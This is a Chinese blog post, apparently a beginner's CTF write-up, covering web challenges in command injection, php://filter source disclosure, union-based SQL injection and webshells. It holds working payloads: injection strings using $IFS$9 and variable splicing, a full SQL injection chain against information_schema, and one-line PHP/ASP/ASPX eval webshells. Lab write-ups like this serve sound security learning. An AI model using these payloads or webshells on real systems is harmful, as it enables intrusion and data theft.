ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

web入门

2022-07-02 21:33:41  阅读:261  来源: 互联网

标签:username web php 入门 23 源代码 flag password


无法查看源代码

这个我f12看不了,用Ctrl+u

robots

提示robots.txt,就在网站后边加上/robots.txt看看有没有,然后在查看flagishere.txt
image

phps文件泄露

在网站后面加/index.phps就可以下载网站的php源代码文件,打开即可。

解压源代码到当前目录

加/WWW.zip 或者/www.zip

[ACTF2020 新生赛]Include

输入127.0.0.1|ls / 看根目录
输入127.0.0.1|cat /flag看flag
image

[极客大挑战 2019]Secret File

感谢大佬博客
点进网站,看源代码
image
那就在网站后面加个/Archive_room.php
image
查看源代码
image
在网站后面加/action.php(把上一步的删掉)
image
可以看到网站闪的很快,这时候我们就要用BurpSuite抓
返回有secret的页面,Foxy改下
image
然后这里改好
image
点secret,网页转圈,BurpSuite有东西出现了
当action.php出现的时候
image
右键发送到repeater
image
然后点repeater再点send
image
可以看到response这里出现了个 secr3t.php
image
返回网址,在后面加/ secr3t.php
image
然后是php伪协议,在网址后面加?file=php://filter/read=convert.base64-encode/resource=flag.php
image
解一下码就是flag了

[GXYCTF 2019]Ping Ping Ping

image
先在网址后边加上/?ip=127.0.0.1
image
成功了,可以用;执行语句了,先用ls查看列表
image
image
尝试直接cat flag.php
image
那就说明需要绕过什么东西去cat它
可以使用$IFS$9绕过空格
?ip=127.0.0.1;cat$IFS$9index.php
image
成功了,然后还得绕过,可以用变量拼接的方法来绕过flag这个关键字。
让变量a=ag,让变量b=fl
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
查看源代码就可以看到flag了
image
码个讲了挺多绕过方法的大佬博客

[极客大挑战 2019]LoveSQL

万能密码登录用户名:1' or 1=1# 密码:123(随便输)

查看源代码发现正确的用户名和密码

那个密码尝试md5碰撞,失败
查询字段数
check.php?username=admin' order by 4%23&password=1
试到4的时候报错了

可知共3个字段。用union查询测试注入点(回显点位)check.php?username=1' union select 1,2,3%23&password=1

得到回显点位为2和3,查询当前数据库名及版本check.php?username=1' union select 1,database(),version()%23&password=1

可知当前数据库为geek,接下来,爆表
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

爆出这两个表,我们试一下l0ve1ysq1这个表,爆字段
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

爆数据
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
得到flag

来自小白的感悟:这一套连招好丝滑但是真的能靠脑子记下来吗=-=

[极客大挑战 2019]Knife

做这道题之前要了解一下webshell和木马

三种一句话木马
php<?php @eval($_POST['x'];?)>
asp<%eval request ("x")%>
aspx<%@ Page Language="Jscript"%> <%eval(Request.Item["x"],"unsafe");%>
然后用中国菜刀或者蚁剑就能弄出来了

标签:username,web,php,入门,23,源代码,flag,password
来源: https://www.cnblogs.com/fengyuxuan/p/16436094.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有